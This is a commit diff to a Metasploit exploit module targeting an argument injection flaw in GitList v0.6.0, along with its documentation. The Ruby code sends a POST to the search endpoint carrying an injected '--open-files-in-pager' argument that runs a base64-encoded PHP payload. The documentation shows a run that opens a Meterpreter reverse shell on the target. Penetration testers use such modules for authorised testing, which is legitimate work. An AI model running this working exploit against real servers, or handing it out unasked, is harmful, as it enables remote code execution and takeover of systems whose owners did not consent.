added documentation and check

documentation/modules/exploit/multi/http/gitlist_arg_injection.md

@@ -0,0 +1,37 @@
+
+## Vulnerable Application
+
+  This module exploits an argument injection vulnerability in GitList v0.6.0
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use [exploit/multi/http/gitlist_arg_injection]`
+  4. Do: `set RHOSTS [IP]`
+  5. Do: `run`
+  6. You should get a session.
+
+## Scenarios
+
+### Tested on Ubuntu 18.04 x64
+
+  ```
+  msf5 > use exploit/multi/http/gitlist_arg_injection
+  msf5 exploit(multi/http/gitlist_arg_injection) > set rhosts 192.168.37.141
+  rhosts => 192.168.37.141
+  msf5 exploit(multi/http/gitlist_arg_injection) > check
+  [+] 192.168.37.141:80 The target is vulnerable.
+  msf5 exploit(multi/http/gitlist_arg_injection) > run
+
+  [*] Started reverse TCP handler on 192.168.37.1:4444
+  [*] Sending stage (37775 bytes) to 192.168.37.141
+  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.141:35804) at 2018-07-05 14:22:39 -0500
+
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
+  Meterpreter : php/linux
+  meterpreter >
+
+  ```

modules/exploits/multi/http/gitlist_arg_injection.rb

@@ -10,9 +10,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "[Vendor] [Software] [Root Cause] [Vulnerability type]",
+      'Name'           => "Gitlist v0.6 Argument Injection",
       'Description'    => %q{
-        Say something that the user might need to know
+       This module exploits an argument injection vulnerability in Gitlist v0.6.
+       The vulnerability arises from GitList improperly validating input using the php function, 'escapeshellarg'.
       },
       'License'        => MSF_LICENSE,
       'Author'         => [ 'Kacper Szurek',  # EDB POC
@@ -20,40 +21,18 @@ class MetasploitModule < Msf::Exploit::Remote
                           ],
       'References'     =>
         [
-          [ 'EDB', '44548' ]
+          [ 'EDB', '44548' ],
+          [ 'URL', 'https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html']
         ],
       'Platform'       => ['php'],
       'Arch'           => ARCH_PHP,
       'Targets'        =>
         [
-          [ 'System or software version',
+          [ 'Gitlist v0.6', { } ]
-            {
-              'Ret' => 0x41414141 # This will be available in `target.ret`
-            }
-          ]
         ],
-      'Payload'        =>
-        {
-          'BadChars' => "\x20"
-        },
       'Privileged'     => false,
       'DisclosureDate' => "Apr 26 2018",
       'DefaultTarget'  => 0))
-
-  end
-
-  def make_request
-      postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-      php = %Q|<?php #{payload.encoded} ?>|
-      cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
-      cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
-      cmd << '\\"));"'
-
-      postRes = send_request_cgi(
-      'method' => 'POST',
-      'uri'    => postUri,
-      'vars_post' => { 'query' => cmd }
-      )
   end
 
   def check
@@ -63,15 +42,24 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'     =>  uri
     )
 
-    unless res
+    if res && res.code == 200 && /Powered by .*GitList 0.6.0/.match(res.body)
-      return Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Vulnerable
     end
 
-    return Exploit::CheckCode::Detected if res.code == 200
+    return Exploit::CheckCode::Unknown
   end
 
   def exploit
-    make_request
+    postUri = normalize_uri(target_uri.path, '/gitlist/tree/c/search')
-  end
+    cmd = '--open-files-in-pager=php -r "eval(base64_decode(\\"'
+    cmd << "#{Rex::Text.encode_base64(payload.encoded)}"
+    cmd << '\\"));"'
 
+    postRes = send_request_cgi(
+    'method' => 'POST',
+    'uri'    => postUri,
+    'vars_post' => { 'query' => cmd }
+    )
+
+  end
 end